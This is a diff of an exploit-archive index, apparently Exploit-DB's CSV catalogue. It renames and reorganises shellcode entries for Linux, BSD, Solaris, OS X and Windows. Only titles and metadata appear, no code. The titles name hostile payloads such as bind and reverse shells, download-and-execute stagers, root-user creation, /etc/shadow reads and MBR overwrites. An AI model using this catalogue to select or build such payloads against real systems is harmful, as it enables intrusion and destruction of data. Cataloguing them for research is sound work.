bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 -13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 +13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 +13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 +13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 -13465,platforms/multiple/shellcode/13465.c,"Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 -13466,platforms/multiple/shellcode/13466.c,"OSX PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 -13467,platforms/multiple/shellcode/13467.c,"Linux/x86 & Unix/SPARC & IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0 -13468,platforms/multiple/shellcode/13468.c,"Linux/x86 & Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0 -13469,platforms/multiple/shellcode/13469.c,"Linux/x86 & bsd/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0 +13465,platforms/multiple/shellcode/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 +13466,platforms/multiple/shellcode/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 +13467,platforms/multiple/shellcode/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0 +13468,platforms/multiple/shellcode/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0 +13469,platforms/multiple/shellcode/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0 13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - kill all processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0 13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - Callback 6666/TCP Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0 13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 Bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0 -13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - Bind 6969/TCP Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 -13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0 -13478,platforms/osx_ppc/shellcode/13478.c,"OSX/PPC - sync()_ reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 +13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 +13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0 +13478,platforms/osx_ppc/shellcode/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 -13480,platforms/osx_ppc/shellcode/13480.c,"OSX/PPC - Add user _r00t_ Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13480,platforms/osx_ppc/shellcode/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13481,platforms/osx_ppc/shellcode/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13482,platforms/osx_ppc/shellcode/13482.c,"OSX/PPC - Add inetd backdoor Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13483,platforms/osx_ppc/shellcode/13483.c,"OSX/PPC - reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 @@ -16009,123 +16013,123 @@ id,file,description,date,author,platform,type,port 13487,platforms/osx_ppc/shellcode/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File + Execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0 -13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 -13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator)",2006-07-21,xort,solaris_sparc,shellcode,0 -13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 -13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind 6666/TCP Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 +13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - setreuid + executes command Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 +13491,platforms/generator/shellcode/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,generator,shellcode,0 +13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 +13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0 -13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind 6789/TCP Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 -13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 -13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 -13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0 +13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind TCP /bin/sh (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 +13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 +13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 +13498,platforms/generator/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",generator,shellcode,0 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 -13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind Shell 28876/TCP Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0 -13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 -13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH Omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 -13508,platforms/win_x86/shellcode/13508.asm,"Win32 - Bind 23/TCP Winexec Telnet Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0 -13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 -13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 -13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 -13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 -13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 -13514,platforms/win_x86/shellcode/13514.asm,"Win32 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,win_x86,shellcode,0 -13515,platforms/generator/shellcode/13515.pl,"Win32 - Download File + Execute Shellcode (Browsers Edition) (Generator) (275+ bytes)",2008-03-14,"YAG KOHHA",generator,shellcode,0 -13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0 -13517,platforms/win_x86/shellcode/13517.asm,"Win32 - Download File + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 -13518,platforms/win_x86/shellcode/13518.c,"Win32/NT/XP - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0 -13519,platforms/win_x86/shellcode/13519.c,"Win32 SP1/SP2 - Beep Shellcode (35 bytes)",2006-04-14,xnull,win_x86,shellcode,0 -13520,platforms/win_x86/shellcode/13520.c,"Win32/XP SP2 - Pop up message box Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0 -13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0 -13522,platforms/win_x86/shellcode/13522.c,"Win32 - Download File + Execute Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0 -13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0 +13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0 +13505,platforms/win_x86/shellcode/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 +13507,platforms/win_x86/shellcode/13507.txt,"Windows x86 - SEH Omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0 +13508,platforms/win_x86/shellcode/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0 +13509,platforms/win_x86/shellcode/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 +13510,platforms/win_x86/shellcode/13510.c,"Windows XP SP2 x86 (French) - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 +13511,platforms/win_x86/shellcode/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 +13512,platforms/win_x86/shellcode/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 +13513,platforms/win_x86/shellcode/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 +13514,platforms/win_x86/shellcode/13514.asm,"Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,win_x86,shellcode,0 +13515,platforms/generator/shellcode/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",generator,shellcode,0 +13516,platforms/win_x86/shellcode/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0 +13517,platforms/win_x86/shellcode/13517.asm,"Windows x86 - Download File + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 +13518,platforms/win_x86/shellcode/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0 +13519,platforms/win_x86/shellcode/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,win_x86,shellcode,0 +13520,platforms/win_x86/shellcode/13520.c,"Windows XP SP2 x86 - Pop up message box Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0 +13521,platforms/win_x86/shellcode/13521.asm,"Windows x86 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0 +13522,platforms/win_x86/shellcode/13522.c,"Windows x86 - Download File + Execute Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0 +13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0 13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0 13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0 13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0 -13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator)",2004-10-25,lion,win_x86,shellcode,0 +13528,platforms/generator/shellcode/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator)",2004-10-25,lion,generator,shellcode,0 13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File + Execute Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 -13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 -13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind 58821/TCP Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 +13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 +13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0 -13533,platforms/win_x86-64/shellcode/13533.asm,"Win64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 +13533,platforms/win_x86-64/shellcode/13533.asm,"Windows x64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - kill all processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0 13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 -13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) + cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 -13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 +13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 +13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 -13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 -13565,platforms/win_x86/shellcode/13565.asm,"Win32 XP SP3 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 +13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - Pverwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 +13565,platforms/win_x86/shellcode/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0 -13569,platforms/win_x86/shellcode/13569.asm,"Win32 XP SP3 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 -13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - Bind 1337/TCP Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0 -13571,platforms/win_x86/shellcode/13571.c,"Win32/XP SP2 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0 +13569,platforms/win_x86/shellcode/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 +13570,platforms/freebsd_x86/shellcode/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode,0 +13571,platforms/win_x86/shellcode/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode,0 13572,platforms/lin_x86/shellcode/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode,0 -13574,platforms/win_x86/shellcode/13574.c,"Win32/XP SP2 (EN + AR) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode,0 +13574,platforms/win_x86/shellcode/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode,0 13576,platforms/lin_x86/shellcode/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,lin_x86,shellcode,0 -13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - break chroot Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 +13577,platforms/lin_x86/shellcode/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot _..._) + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 13578,platforms/lin_x86/shellcode/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode,0 -13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - Append '/etc/passwd' + exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 +13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13582,platforms/windows/shellcode/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0 -13595,platforms/win_x86/shellcode/13595.c,"Win32 XP SP2 (FR) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0 +13595,platforms/win_x86/shellcode/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0 13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 13601,platforms/lin_x86/shellcode/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 13602,platforms/lin_x86/shellcode/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 -13609,platforms/lin_x86/shellcode/13609.c,"Linux/x86 - bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,lin_x86,shellcode,0 -13614,platforms/win_x86/shellcode/13614.c,"Win32 XP SP3 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 -13615,platforms/win_x86/shellcode/13615.c,"Win32 XP SP2 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 -13627,platforms/lin_x86/shellcode/13627.c,"Linux/x86 - /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode,0 +13609,platforms/lin_x86/shellcode/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,lin_x86,shellcode,0 +13614,platforms/win_x86/shellcode/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 +13615,platforms/win_x86/shellcode/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode,0 +13627,platforms/lin_x86/shellcode/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode,0 13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0 13630,platforms/win_x86/shellcode/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode,0 13631,platforms/win_x86/shellcode/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode,0 -13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0 -13635,platforms/win_x86/shellcode/13635.txt,"Win32 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0 -13636,platforms/win_x86/shellcode/13636.c,"Win32 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0 -13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0 -13642,platforms/win_x86/shellcode/13642.txt,"Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0 +13632,platforms/lin_x86/shellcode/13632.c,"Linux/x86 - Disabled modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode,0 +13635,platforms/win_x86/shellcode/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode,0 +13636,platforms/win_x86/shellcode/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode,0 +13639,platforms/win_x86/shellcode/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode,0 +13642,platforms/win_x86/shellcode/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode,0 13645,platforms/windows/shellcode/13645.c,"Windows - JITed Egghunter Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0 -13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0 